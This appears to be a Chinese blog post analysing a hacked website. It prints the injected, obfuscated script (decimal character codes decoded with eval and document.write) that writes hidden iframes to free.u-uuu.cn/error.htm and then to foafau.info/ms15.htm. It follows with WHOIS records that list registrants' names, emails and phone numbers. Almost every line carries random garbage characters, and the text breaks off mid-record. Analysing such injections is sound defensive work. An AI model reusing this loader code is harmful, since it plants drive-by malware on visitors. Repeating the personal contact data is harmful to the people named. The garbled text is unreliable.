首发在我的博客里面,
hj1jY I\23as0q http://www.areway.cn/?p=175 ~.PYS!" + YR.'JF`C FCPRg^=<!~ 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
LeCU"~ _@TTVd <script>t=’60,105,102,114,97,109,101,
}YO}LQ-| 32,115,114,99,61,104,116,116,112,58,47,47,
PEl]HI_H 102,114,101,101,46,117,45,117,117,117,46,99,
NBYE#Uih 110,47,101,114,114,111,114,46,104,116,109,
PBv43uIL 32,119,105,100,116,104,61,49,48,48,32,104,
/B7
GH5 101,105,103,104,116,61,48,62,60,47,105,102,
G#v7-&Yl6 114,97,109,101,62′;
mio'm t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
`yXy T^ A-$BB=Ot <script>t=’60,105,102,114,97,109,101,32,115,
e8.bH# 114,99,61,104,116,116,112,58,47,47,102,114,
Uo
,3 lMr 101,101,46,117,45,117,117,117,46,99,110,47,
K_}acU 101,114,114,111,114,46,104,116,109,32,119,
Hkt'~L* 105,100,116,104,61,49,48,48,32,104,101,105,
U?{j 103,104,116,61,48,62,60,47,105,102,114,97,
|VL,\&7rk 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
B=Os?'2[ document.write(t);</script>
Of=z!|l2 `-\"p;Hp0 <html xmlns=”
CcTJCuOS http://www.w3.org/1999/xhtml STI3|}G*P “>
&i!] <head>
op C11c/ <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
Fu/CX4R_| <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
zOw]P6Gk <title>首页 - 爱生活家庭网
$@j7VPE 5KSsRq/8" 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
(" %yV_R 转换字符串后的大概内容是(谁点击后果自付):
B!v1gh <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
L)5nb-qp "/"k50% 查询玉米u-uuu.cn的详细信息:
=Yk$Q\c Domain Name: u-uuu.cn
W|
p?KJk) ROID: 20070901s10001s64972306-cn
)J0VB't Domain Status: ok
!@X#{ Registrant Organization: 王雷
Y# #J Registrant Name: 王雷
]Y?$[+Y Administrative Email:
czlovexs@126.com CmZ?uo+Y Sponsoring Registrar: 北京万网志成科技有限公司
=l+p nG Name Server:ns.yovole.com
n6}1{\ Name Server:ns1.yovole.com
elN3B91\6r Registration Date: 2007-09-01 17:54
<]nI)W( Expiration Date: 2008-09-01 17:54
y=Hl ~ev`9 最后PING了一下地址 都没有什么….
5\J;EWTU G`z48 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
TxWjgW~ <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
.8m)^ET <script language=”javascript” src=”
L%"Mp(gZ http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script "<WSEs >
|D~MS`~qd5 这个玉米应该有可能是木马作者的:
Mi/_hzZ\ foafau.info的详细信息:
j;
C(:6#J Access to INFO WHOIS information is provided to assist persons in
))N^)HR determining the contents of a domain name registration record in the
c#DTL/8"DO Afilias registry database. The data in this record is provided by
2i)y'+s Afilias Limited for informational purposes only, and Afilias does not
i=4bY[y guarantee its accuracy. This service is intended only for query-based
h(sD] N access. You agree that you will use this data only for lawful purposes
+l9avy+P( and that, under no circumstances will you use this data to: (a) allow,
0)NHjKP enable, or otherwise support the transmission by e-mail, telephone, or
83a
Rq&(R facsimile of mass unsolicited, commercial advertising or solicitations
0AEs+= to entities other than the data recipient’s own existing customers; or
)+G(4eIT (b) enable high volume, automated, electronic processes that send
$4"OD"Z Cq queries or data to the systems of Registry Operator, a Registrar, or
Ub$$wOsf Afilias except as reasonably necessary to register domain names or
LtQy(F%8/ modify existing registrations. All rights reserved. Afilias reserves
){}#v& the right to modify these terms at any time. By submitting this query,
82vx:*Ip!} you agree to abide by this policy.
lV?SvXe Domain ID:D22418703-LRMS
a
srkuAS Domain Name:FOAFAU.INFO
QEPmuG Created On:20-Nov-2007 16:05:42 UTC
L0Cf@~k Last Updated On:20-Nov-2007 16:05:44 UTC
f19
i
! Expiration Date:20-Nov-2008 16:05:42 UTC
-h_v(s2 Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
MouYZI) Status:CLIENT DELETE PROHIBITED
Fi#t88+1 Status:CLIENT RENEW PROHIBITED
[D)A+ Status:CLIENT TRANSFER PROHIBITED
#/:[ho{JQ Status:CLIENT UPDATE PROHIBITED
&}FYz8w 2/ Status:TRANSFER PROHIBITED
,y.0Cb0 Registrant ID:GODA-040110615
(Gc5lMiX3 Registrant Name:liu hong
rcK*",> Registrant Organization:
0ePZxOSjD Registrant Street1:beijing
w-2]69$k Registrant Street2:
X DX_c@U Registrant Street3:
ihn M`TpMJ Registrant City:beijing
R3~&|>7/T Registrant State/Province:
TuU.yvkU Registrant Postal Code:100000
m^7pbJ\| Registrant Country:CN
cZYX[.oIB Registrant Phone:+86.860108888777
qH
~usgqB7 Registrant Phone Ext.:
4c% :?H@2 Registrant FAX:
qr@,92_ Registrant FAX Ext.:
o8,K1ic5# Registrant Email:bbbshiji@163.com
L*Y}pO Admin ID:GODA-240110615
0kkiS3T Admin Name:liu hong
pmS=$z;I Admin Organization:
|] YT6-?. Admin Street1:beijing
efhwbn Admin Street2:
s0:1G
-I Admin Street3:
s)V^_@Z9 Admin City:beijing
& mWq'h Admin State/Province:
^2=zp.) Admin Postal Code:100000
Ov9.qNT Admin Country:CN
5HU>o|. Admin Phone:+86.860108888777
Ort\J~O Admin Phone Ext.:
1@y?OWC Admin FAX:
| @YN\g K; Admin FAX Ext.:
VltWY'\Wu; Admin Email:bbbshiji@163.com
i8{jMe!Sa Billing ID:GODA-340110615
0nS6<: Billing Name:liu hong
B}(YD;7vJ Billing Organization:
\ Q6Ip@? Billing Street1:beijing
+]6 EkZO Billing Street2:
@l?%]%v| Billing Street3:
arB$&s Billing City:beijing
}vi%pfrB Billing State/Province:
SlZu-4J.- Billing Postal Code:100000
6Z"%vrH Billing Country:CN
:$WRV- Billing Phone:+86.860108888777
~ce.&C7cR Billing Phone Ext.:
23=;v@ Billing FAX:
Fh"S[e Billing FAX Ext.:
:J"e{|g', Billing Email:bbbshiji@163.com
L?P8/]DGp Tech ID:GODA-140110615
{T IGPK Tech Name:liu hong
(3-G<